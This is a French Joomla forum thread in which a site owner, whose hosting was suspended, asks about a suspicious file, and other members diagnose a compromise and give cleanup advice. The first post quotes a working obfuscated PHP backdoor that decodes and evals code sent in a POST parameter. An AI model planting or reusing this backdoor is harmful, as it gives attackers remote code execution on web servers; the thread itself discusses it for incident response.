Site Bloquer joomla Version 3

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Site Bloquer joomla Version 3

    Bonsoir,

    Depuis 3 jours mon compte ovh est desactiver suite a un message envoyer pas ce dernier:

    Notre système de surveillance (Okillerd) a détecté une opération
    irrégulière au niveau de votre site.

    Les détails de cette opération sont les suivants :


    Problème rencontré : Executing deleted program
    Commande apparente : ././crond
    Exécutable utilisé : /DOSSIER/modules/mod_stats/.nfs00000000041c07fb00000b62
    Horodatage: 2015-02-16 20:05:06

    ou j'ai trouver ce code:

    $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n318a65'])) {eval($s21(${$s20}['n318a65']));}?>

    je voudrais savoir c'est quoi comme problème


    Merci de votre réponse
    Dernière édition par guns à 16/02/2015, 21h35
    www.easy-gfx.com
    www.neptune-informatique.com
    www.world-transit-company-tn.com
    ---------------------------------------------

  • #2
    Re : Site Bloquer joomla Version 3

    Bonsoir,
    a 99% -> ton site s'est fait hacké !

    quelle version de Joomla as tu ?
    Dernière édition par manu93fr à 16/02/2015, 21h44
    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

    Commentaire


    • #3
      Re : Site Bloquer joomla Version 3

      Merci pour votre réponse rapide

      oui je le pense aussi mais comment faire pour résoudre ce problème

      c'est la dernière version de joomla

      je viens de m'apersevoir que dans le dossier admin il y a un dossier que je n'est pas créer et qui ne veux pas s'effacer "C:"????
      www.easy-gfx.com
      www.neptune-informatique.com
      www.world-transit-company-tn.com
      ---------------------------------------------

      Commentaire


      • #4
        Re : Site Bloquer joomla Version 3

        Bonsoir

        Il n'y a aucun doute; tu as été hacké.

        Le fait que ce soit la dernière version de Joomla est une bonne chose et laisserait à croire que le hack est arrivé par un autre chemin (un composant, un module, ton template).

        Si tu as un backup sain récent; le plus simple serait de le restaurer. Sinon, télécharge ton site en local et nettoie-le puis change tous tes mots de passe; vérifie que tu n'as pas de super admin vérolé, ... Tu as beaucoup de boulot à faire (et sans aucun doute au moins quatre heures de travail).

        Tu trouveras énormément d'article sur Google concernant cette thématique ("site hacké, que faire?")

        Bonne soirée et courage.
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Re : Site Bloquer joomla Version 3

          Et puisque Christophe sait rester humble .... je le dis pour lui
          Je te conseille cet excellent site
          Tu y trouveras une mine d'information sur la securité et comment nettoyer un site verolé .... BON COURAGE !!!! car il va t'en falloir
          Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
          Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

          Commentaire


          • #6
            Re : Site Bloquer joomla Version 3

            Merci les gas... pour tt c info une chose est sur c'est que j'efface tt je réinstalle joomla je change mes mots de passe et j’espère que sava résoudre mon probléme
            www.easy-gfx.com
            www.neptune-informatique.com
            www.world-transit-company-tn.com
            ---------------------------------------------

            Commentaire


            • #7
              Re : Site Bloquer joomla Version 3

              si tu reinstalle tout du debut ... FTP vidé ... base de donnée ... vidée ... sur qu'il n'y aura plus de problème ... mais tu auras un site Joomla de base
              Tu n'as pas plutot une sauvegarde de ton site ?

              Autre chose, scanne ton PC ... il y a souvent des virus qui passe sur le web en meme temps que le transfert via FTP (si ton ordi est insfecté)
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire

              Annonce

              Réduire
              Aucune annonce pour le moment.

              Partenaire de l'association

              Réduire

              Hébergeur Web PlanetHoster
              Travaille ...
              X